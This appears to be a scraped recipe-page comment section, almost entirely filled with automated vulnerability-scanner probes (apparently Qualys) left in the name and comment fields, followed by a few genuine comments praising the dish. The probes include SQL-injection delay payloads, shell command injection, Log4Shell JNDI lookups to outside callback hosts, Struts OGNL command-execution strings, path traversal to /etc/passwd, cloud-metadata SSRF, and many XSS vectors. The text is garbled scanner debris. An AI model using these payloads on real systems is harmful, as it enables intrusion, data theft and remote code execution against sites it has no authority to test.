1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '

John

1

John

1

John

1

John' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '

1

John

1

John

1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)

John

1

John

1

John + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)

1

John

1',0,0);WAITFOR DELAY'00:00:29'--

John

1

John

1

John',0,0);WAITFOR DELAY'00:00:29'--

1

John

1

John

1');WAITFOR DELAY '00:00:29'--

John

1

John

1

John');WAITFOR DELAY '00:00:29'--

1

John

1

John

1';WAITFOR DELAY '00:00:29'--

John

1

John

1

John';WAITFOR DELAY '00:00:29'--

1

John

1

John

1

John);WAITFOR DELAY '00:00:29'--

1

John

1;WAITFOR DELAY '00:00:29';

John

1

John;WAITFOR DELAY '00:00:29';

1

John

1WAITFOR DELAY '00:00:29'

John

1

JohnWAITFOR DELAY '00:00:29'

1

John

1

John

1

John

1

|ping -c2 -i91 localhost|

1

John

|ping -c2 -i91 localhost

John

1

John

1

|ping -c2 -i91 localhost

1

John

ping -c2 -i91 localhost

John

1

John

1

ping -c2 -i91 localhost

1

John

1

John

aaaa&ping -n 92 localhost&

John

1

John

1

John

1

aaaa&ping -n 92 localhost&

1

John

1

John

1

John

1

John

1" or true() or "and" = "and

John

1

John

1

John" or not(false()) or "true" = "true

1

John

1

John" or true() or "and" = "and

1

John

1

John

1 and false() and 'or' = 'and'

John

1

John

1

John or true() or 'and' = 'and'

1

John

1

John

1

John

1

John

1

John

1

John

1' or true() or 'and' = 'and

John' and false() and 'or' = 'and

1

John' or true() or 'and' = 'and

1

John

15 oR 9=8 + 1

John

1

John

1

John

1

John

1

John

1

John

1

John1 or 11=12

1

John1 or 11=11

1

John

1

John

1' or 'tpklq'='tpklq

John

1

John

1

John' or 'tpklq'='tpklq

1

John

1

John

1') and 'swqtp'='ptqws

John

1

John

1

John

1

John

1

John') and 'swqtp'='ptqws

1

John') or 'swqtp'='swqtp

1

John

1 aND 7248=2491 + 4757

John

1

John aND 7248=2491 + 4756

1

John aND 7248=2491 + 4757

1

John and NULL IS NULL

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John oR 6248=2491 + 3757

1

John or NULL IS NULL

1

John

1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729

John

1 or 4325=4325 --

John /* or __Q_1__ */aND 4325=1597 + 2729 -- oR 2728

1

John /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729

1

John or 4325=4325 --

1

John

1

John

1

John

1

John

1

John' or 3789=3789 --

1

John

1') and 2634=1123 --

John

1

John') or 2634=2634 --

1

John

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://1f4cc0504a8b6cb88676085becdd86bd0a70f3b0.1447543917359663.900542173.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

John

1

${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://9920555cd477bade77dce0632aea491641de4936.1447543917359663.1311577348.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

1

John

1

John

1

${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://4d80510f267a0d397cd5912d4a3bac6f7bd97d63.1447543917359663.1485451159.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//959ed45b3d4fcffa3b2366a0e1c0476ef1d6e810.1447543917359663.3527420217.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

John

1

John

1

John

1

John

${jndi:dns://a397e183b87a316a4292c0fa26011b3665a1b8fa.1447543917359663.744021073.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

${jndi:dns://ea1d3f438d6a1762fa15c2cbc1dec5a591a90ad5.1447543917359663.2239760849.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

1

John

${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//c25a85aae0a4dabe9016aeebc0f359ba1116f9eb.1447543917359663.2518145609.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

John

1

John

1

${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//3161faced5340733f4859046843644472a63289d.1447543917359663.2651543383.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

${jnd${123%ff:-${123%ff:-i:}}ldap://33df05f273d169cdb9bd6cba919e4420cf3e1a27.1447543917359663.2144089550.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

${jnd${123%ff:-${123%ff:-i:}}ldap://6886ac98ad95f0324b9ba4bb50e2059590d4d2f0.1447543917359663.113813377.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

1

John

${j${::-n}di:ldap${::-:}//0f0d22f41747a3526480ae8b111e069460049ef9.1447543917359663.944673790.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

John

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://e65cbe22808210594d129ba8d3c2f534a814f864.1447543917359663.3051823761.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

John

1

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://4e4f063f07e141249c45f9410b3d650a79cf7d34.1447543917359663.4142589967.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

1

John

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://09646d50abb30092ebd4442b8dd0670c182529c2.1447543917359663.2673315276.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://2c92a6516d2b529713474a2b4642233c45e706dd.1447543917359663.2898433642.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

1

John

${jndi:rmi://3403750df7efe0d9f53c5e48d254ccd2c558a16b.1447543917359663.1731979337.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

John

1

John

1

${jndi:rmi://aca2d6d3e2c2e175586d770491f93b902b478805.1447543917359663.3555129696.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

${jndi:ldap://0661056b8501c4d5c81d2b456d9f6689ff865179.1447543917359663.1436965645.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}

John

1

${jndi:ldap://d80d44be1babd91d78ee2448beede85081473a59.1447543917359663.545085294.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}

1

John

1

John

ping -c 2 b2aa5e27fba47dea00b0b1f8f1235bf80267e573.1447543917359663.2977940476.oscomm01.oscomm.eu1.qualysperiscope.com.

John

1

John

1

ping -c 2 ec180bfd075d1433c0c9b41707154b8e19335c07.1447543917359663.765763261.oscomm01.oscomm.eu1.qualysperiscope.com.

1

John

1

John

1

http://a22c427fff921f9d9fbdc1f86c3f93ec7037c351.1447543917359663.3009714260.ssrf01.ssrf.eu1.qualysperiscope.com.

1

John

Joe+ bcc:was_engine@683e9cac29380b79486651c290ac58052ebb0dcb.1447543917359663.4294876594.smtphi01.smtp.eu1.qualysperiscope.com.

John

1

Joe+ bcc:was_engine@462de72410171607bc6b7b55e97c00673e1cf230.1447543917359663.1566500562.smtphi01.smtp.eu1.qualysperiscope.com.

1

John

1

John

http://169.254.169.254/latest/meta-data/

John

1

John

1

http://169.254.169.254/latest/meta-data/

1

John

1

John

</script><script>function(){qxss8q68oMTh};</script>

John

1

John

1

John

1

John

<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->

John

1

John

1

<!--#config timefmt="<%A><%B><%d><%Y>" -->qualyswas:<!--#echo var="DATE_LOCAL" -->

1

John

1

John

1

John

1

John

1

John

;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */

John

1

;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */

1

John

{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}

John

1

John

1

{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}

1

John

|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>

John

1

John

1

|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>

1

John

1

John

"-qxss89Aw2IF8()-"

John

1

"-qxssC8ESsvd2()-"

1

John

'-qxss30e2261i()-'

John

1

John

*/;(function(){qxss410C08s3});/*

John

1

John

1

John

1

John

9 ;(function(){qxssoSg1SN0g});//

John

1

John

1

9 ;(function(){qxss5xOR3Wej});//

1

John

9;(function(){qxssHD3ePjq9});//

John

1

John

1

9;(function(){qxssa0E750N6});//

1

John

1

John

';(function(){qxssv5GZn0FD});/**/'

John

1

John

1

';(function(){qxssBgE03gA5});/**/'

1

John

1

John

1

qualys(aqxssf0s76Yyn)xyz

1

John

");(function(){qxssDIbxNTn7});/**/"

John

1

John

1

");(function(){qxssFmfOGl5Q});/**/"

1

John

1

John

";(function(){qxss8fSh4EUo});/**/"

John

1

John

1

";(function(){qxssD36JI2AW});/**/"

1

John

javascript:qxss(X170842728Y7_2Z);

John

1

John

1

javascript:qxss(X170842728Y1_2Z);

1

John

http://rfitest/

John

1

John

1

John

1

http://rfitest/

1

John

1

John

|netstat -an

John

1

John

1

|netstat -an

1

John

a(){}phpinfo(); function a

John

1

John

1

a(){}phpinfo(); function a

1

John

1

John

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

John

1

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstan

1

John

%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

John

1

John

1

%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#

1

John

%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

John

1

John

1

%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#og

1

John

1

John

../../../../../../../Windows/System32/drivers/etc/hosts

../../../../../../../Windows/System32/drivers/etc/hosts

1

John

../../../../../../../Windows/System32/drivers/etc/hosts

John

1

John

1

John

1

../../../../../../../Windows/System32/drivers/etc/hosts

1

John

1

John

//....//....//....//....//....//....//....//etc/passwd

John

1

John

1

John

1

//....//....//....//....//....//....//....//etc/passwd

1

John

1

John

//..//..//..//..//..//..//..//etc/passwd

John

1

John

1

//..//..//..//..//..//..//..//etc/passwd

1

John

1

John

../../../../../../../etc/passwd

John

1

John

1

../../../../../../../etc/passwd

1

John

/../../../../../../../etc/passwd

John

1

John

1

John

1

/../../../../../../../etc/passwd

1

John

/../../../../../../../etc/passwd

John

1

John

1

/../../../../../../../etc/passwd

1

John

1

John

1

1

John

1

John

1e309

John

1

John

1

John

1

1e309

1

John

1

John

(

John

1

John

1

(

1

John

1

John

,

John

1

John

1

John

1

,

1

John

``

John

1

John

1

John

1

``

1

John

1

John

/*

John

1

/*

1

John

1

John

#

John

1

John

1

John

1

#

1

John

1

John

1

John

1

;--

1

John

1'

John

1

John

1

John'

1

John

qualys<esi:comment text="" />was<!--esx-->esi

John

1

John

1

qualys<esi:comment text="" />was<!--esx-->esi

1

John

1

q Qualys_resp_hdr_injection: Vulnerable

1

John

1

q Qualys_resp_hdr_injection: Vulnerable

1

John

q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA

q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA

1

John

<script src=http://localhost/j

John

1

John

1

John

1

<script src=http://localhost/j

1

John

1

John

%3cscript z%3e_q(y)%3c/script%3e

John

1

John

1

%3cscript z%3e_q(y)%3c/script%3e

1

John

< script a=4>qss2Y9Y5hd8=7< /script>

John

1

John

1

John

1

< script a=4>qsss7bWzUWC=7< /script>

1

John

1

John

" onEvent=X170842728Y7_2Z

John

1

John

1

" onEvent=X170842728Y1_2Z

1

John

1

John

' onEvent=X170842728Y7_2Z

John

1

' onEvent=X170842728Y1_2Z

1

John

1

John

"'><qss a=X170842728Y7_2Z>

John

1

"'><qss a=X170842728Y1_2Z>

1

John

1

John

<EMBED SRC=//localhost/q15ci10OT.swf AllowScriptAccess=always></EMBED>

John

1

John

1

<EMBED SRC=//localhost/q37PAEAFe.swf AllowScriptAccess=always></EMBED>

1

John

1

John

<STYLE type="text/css" a=3>BODY{background:url("javascript:qssSZ5qsMSG=7")}</STYLE>

John

1

John

1

<STYLE type="text/css" a=3>BODY{background:url("javascript:qss5S4X8O3d=7")}</STYLE>

1

John

1

John

1"><DIV STYLE="width:expression(qssMZXj7wuQ=7)">

John

1

John

1

John

1

John"><DIV STYLE="width:expression(qss8C09D5X6=7)">

1

John

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:qssYTm8R8FA=7">

John

1

John

1

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:qss9FeCT4d4=7">

1

John

<IMG SRC=javascript:qssdq1AlCQL=7>

John

1

<IMG SRC=javascript:qssEW5P4U40=7>

1

John

"'><<SCRIPT a=2>qssHU15N66N=7;//<</SCRIPT>

John

1

John

1

John

1

"'><<SCRIPT a=2>qss9a51Z9Ls=7;//<</SCRIPT>

1

John

<SCRIPT/QSSK1Q3U2Tx SRC=//localhost/j>

John

1

John

1

John

1

<SCRIPT/QSSXmkI2v7u SRC=//localhost/j>

1

John

1

John

1

John

1

John

1

John

1

John

1

<script src=//localhost/j1Bx0Yd87>

1

John

1 <script>_q_q=random(9JAAf845)</script>

John

1

John

1

John

1

John <script>_q_q=random(Did1y63G)</script>

1

John

<script>_q=random(X170842728Y7_2Z)</script>

John

1

John

1

John

1

John

<script>_q=random(X170842728Y7_2Z)</script>

John

1

John

1

John

1

<script>_q=random(X170842728Y1_2Z)</script>

1

John

1

John

"'><qssm33DffZP `;!--=&{()}>

John

1

John

1

"'><qss1sT2iE05 `;!--=&{()}>

1

John

1

John

z--><qssIQs0SO92>

John

1

z--><qss98IM67uO>

1

John

1

John

1"'><qss3kV55zSp>

John

1

John

1

John

"><qss4k5VFv8X>

John

1

John

1

"><qsswiIZJRf8>

1

John

javascript:qxss(X170842728Y7_2Z);

John

1

John

1

John

1

javascript:qxss(X170842728Y1_2Z);

1

John

1

John

" onEvent=X170842728Y7_2Z

John

1

John

1

" onEvent=X170842728Y1_2Z

1

John

1

John

' onEvent=X170842728Y7_2Z

John

1

' onEvent=X170842728Y1_2Z

1

John

1

John

1

<script>_q=random(X170842728Y1_2Z)</script>

1

John

"'><qss a=X170842728Y7_2Z>

John

1

"'><qss a=X170842728Y1_2Z>

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John'; var djci=sleep(29*1000);//

1

John

1

John

1WAITFOR DELAY '00:00:29'

John

1

John

1

John

|ping -c2 -i91 localhost|

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

ping -c2 -i91 localhost

John

1

John

1

John

aaaa&ping -n 92 localhost&

John

1

aaaa&ping -n 92 localhost&

1

John

John

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John or NULL IS NULL

1

John

1

John

1

John

ping -c 2 35a20a6ad19d81e049a8c162d9e0f19ba36f0200.1430694317359663.2209570882.oscomm01.oscomm.eu1.qualysperiscope.com.

John

1

John

1

ping -c 2 7fa7ac1ff5d25851959944ddb28c2f0461cc2e10.1430694317359663.110680216.oscomm01.oscomm.eu1.qualysperiscope.com.

1

John

1

John

http://0008865ec55ef594fe3d5a0def4ca0ab9a600c88.1430694317359663.1459880869.ssrf01.ssrf.eu1.qualysperiscope.com.

John

1

John

1

John

1

</script><script>function(){qxss80VlTL4E};</script>

1

John

(23.0231*213.759)

John

1

(23.0231*213.759)

1

John

;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */

John

1

John

1

John

1

John

{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}

John

1

John

1

John

1

John

|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>

John

1

John

1

|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}<%= 23.0231*213.759 %>

1

John

1

John

"-qxss5QFWzvno()-"

John

1

John

1

John

1

John

1

John

'-qxss65hjlUVm()-'

John

1

John

1

'-qxssjzyViYI1()-'

1

John

*/;(function(){qxssinJ6Fa5R});/*

John

1

John

1

*/;(function(){qxssi5O4hAe9});/*

1

John

9 ;(function(){qxssT6i9L75v});//

John

1

John

1

John

9;(function(){qxss6o8wHLNy});//

John

1

John

1

9;(function(){qxssMiWUn6i5});//

1

John

1

John

1

John

qualys(aqxssFFCB0yxZ)xyz

John

1

John

1

qualys(aqxssC6v0M42q)xyz

1

John

1

John

");(function(){qxss5UO5NOCB});/**/"

John

1

John

1

");(function(){qxssAC95p843});/**/"

1

John

";(function(){qxss69coDe8X});/**/"

John

1

John

1

John

1

John

1

John

javascript:qxss(X174975660Y7_2Z);

John

1

John

1

John

1

John

1

John

1

John

1

http://rfitest/

1

John

1

John

|netstat -an

John

1

John

1

John

1

John

a(){}phpinfo(); function a

John

1

John

1

John

1

a(){}phpinfo(); function a

1

John

../../../../../../../Windows/System32/drivers/etc/hosts

John

1

John

1

John

1

John

1

John

1

John

1

../../../../../../../Windows/System32/drivers/etc/hosts

1

John

1

John

1

John

1

//....//....//....//....//....//....//....//etc/passwd

1

John

1

John

1

//..//..//..//..//..//..//..//etc/passwd

1

John

../../../../../../../etc/passwd

John

1

John

1

../../../../../../../etc/passwd

1

John

/../../../../../../../etc/passwd

John

1

John

1

John

1

/../../../../../../../etc/passwd

1

John

/../../../../../../../etc/passwd

John

1

/../../../../../../../etc/passwd

1

John

1

John

John

1

John

1e309

John

1

John

1

1e309

1

John

(

John

1

John

1

(

1

John

1

John

,

John

1

John

1

John

1

John

``

John

1

John

1

John

1

John

/*

John

1

John

#

John

1

John

1

John

;--

John

1

;--

1

John

1

John

1'

John

1

John

1

John

1

John

1

John

q Qualys_resp_hdr_injection: Vulnerable

John

1

John

<script src=http://localhost/j

John

1

John

1

John

1

John

1

John

1

John

< script a=4>qssXdQL6o7L=7< /script>

John

1

John

1

John

1

John

" onEvent=X174975660Y7_2Z

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

"'><qss a=X174975660Y1_2Z>

1

John

1

John

1

John

<SCRIPT/QSS8sAc6Tb0 SRC=//localhost/j>

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John <script>_q_q=random(D9BtZPn4)</script>

1

John

1

John

<script>_q=random(X174975660Y7_2Z)</script>

John

1

<script>_q=random(X174975660Y1_2Z)</script>

1

John

1

<script>_q=random(X174975660Y1_2Z)</script>

1

John

1

John

1

z--><qssQ2nQ1k88>

1

John

1"'><qsspfU5fvp3>

John

1

John

1

John"'><qss482svdnl>

1

John

1

John

1

John

1

John

1

John

1

John

javascript:qxss(X174975660Y7_2Z);

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

1

John

<script>_q=random(X174975660Y7_2Z)</script>

John

1

John

1

John

1

John

1

John

1

"'><qss a=X174975660Y1_2Z>

1

John

1

John

1

Elie

yummmm....

Kiran Saleem

tasty

Robin

I loved it! It was delicious.

Kiran

I tried many recipes but this one is just WOW...

Loading…
Loading the web debug toolbar…
Attempt #